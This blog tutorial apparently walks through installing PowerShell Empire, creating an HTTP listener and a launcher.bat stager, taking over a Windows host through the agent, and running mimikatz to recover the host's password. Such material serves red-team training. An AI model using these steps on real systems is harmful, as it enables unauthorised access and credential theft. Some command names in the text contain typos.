Hello my dear readers, in this article I am going to
introduce you with a very powerful PowerShell tool, which is called “empire”.
Powershell Empire is a post exploitation tool which is mostly used in computers
and servers running Microsoft Windows, Windows Server Operating systems. It is
cryptographically protected and provides flexible architecture.
The best part of Powershell Empire is, it can execute
powershell agent without the need of Powershell.exe. It is mostly similar
to Metasploit and Meterpreter except user can use the Empire as command and
control tool, to control a PC more efficiently.
Components of Empire:
Listener: The listener is a process which listens for
connections from the target system and helps the empire send the loot
(ex-filtered data) back to the attacker’s system.
Stager: A stager is a snippet of code which provides the
platform to execute the malicious code to be run via the agent on the
compromised system.
Agent: An agent is a piece of code which maintains a
connection between your system and the compromised host.
Module: These are what execute the malicious command and
harvest the credentials and escalate the privilege and other desired intention.
Installation of Empire framework:
#Download the repository
git clone https://github.com/EmpireProject/Empire.git
#Install Empire
sudo bash ./Empire/setup/install.sh
#start the Empire console
./empire
Note: If any case it will through errors while starting, please go to the setup directory and execute “./reset” script. Hope it will resolve the issue.
The below window you will get when the Empire console successfully open up.
Type help command for get to know more about commands those
are available to use.
We will start with the creation of a listener. The listener
is nothing but the component which is running inside the command and control
server and wait for the compromised host to connected to it.
Please enter the below commands to create a listener.
#Enter the listeners menu
# View available listener types
Type “uselistener <TAB>”
# Create a listener
In this article we will use “http” listener.
Once selected the listener we want to create, now enter
“info” to display the available options
You will get the available parameters with default values.
If you want you can change using set command like metasploit.
Once we are satisfied with the settings we can proceed to
type execute command.
Like metasploit we can easily create payloads in Empire to
connect to the host. To view the available payloads in empire we need the type
the below command.
# View all payload types
Ø
usestager <TAB>
In this article we will choose windows/lunch_bat
Ø
userstager windows/launcher.bat
Type “info” to get available fields and their default
values.
If all set then we can proceed to type execute command and
hit the enter.
Now copy the launcher.bat file and execute it inside the
targeted system and comeback.
If our system is reachable to the targeted host we can
easily receive a connection back to Empire.
To see the connection type “agents” command to see the
available connection list. Some time it will take few minutes to get the
connection.
Now enter ‘help’ to get all the possible option to
communicate with the compromised host.
We will use interact command with the agent name to connect
to the targeted host
Ø
interact E9Y42CU3
After get inside the host type "help" to get the more options,
that are available to perform with the compromised host.
Let’s start with the ‘info’ command and have all the details
about the target.
Next we will type ‘sysinfo’ to get the system information.
So we do not stop with the basic info let’s try the
Mimicatz. Which is known as the most powerful post exploitation tool.
# To Launch mimikatz type
Ø
mimikatz
Here in the output we have got the password (12345) of the compromised host
(192.168.220.128) successfully. We can get lot of other informations as well, let's not discuss here. I will write a separate article on this in my upcoming blog.
You can do much more things with Powershell Empire. Just
check more about it in Google, Github and the Wiki page.
I hope you enjoyed this article. Please do share and let me
know your feedback and other queries in the comment section. See you in my next article. Happy
Hacking!!
0 comments:
Post a Comment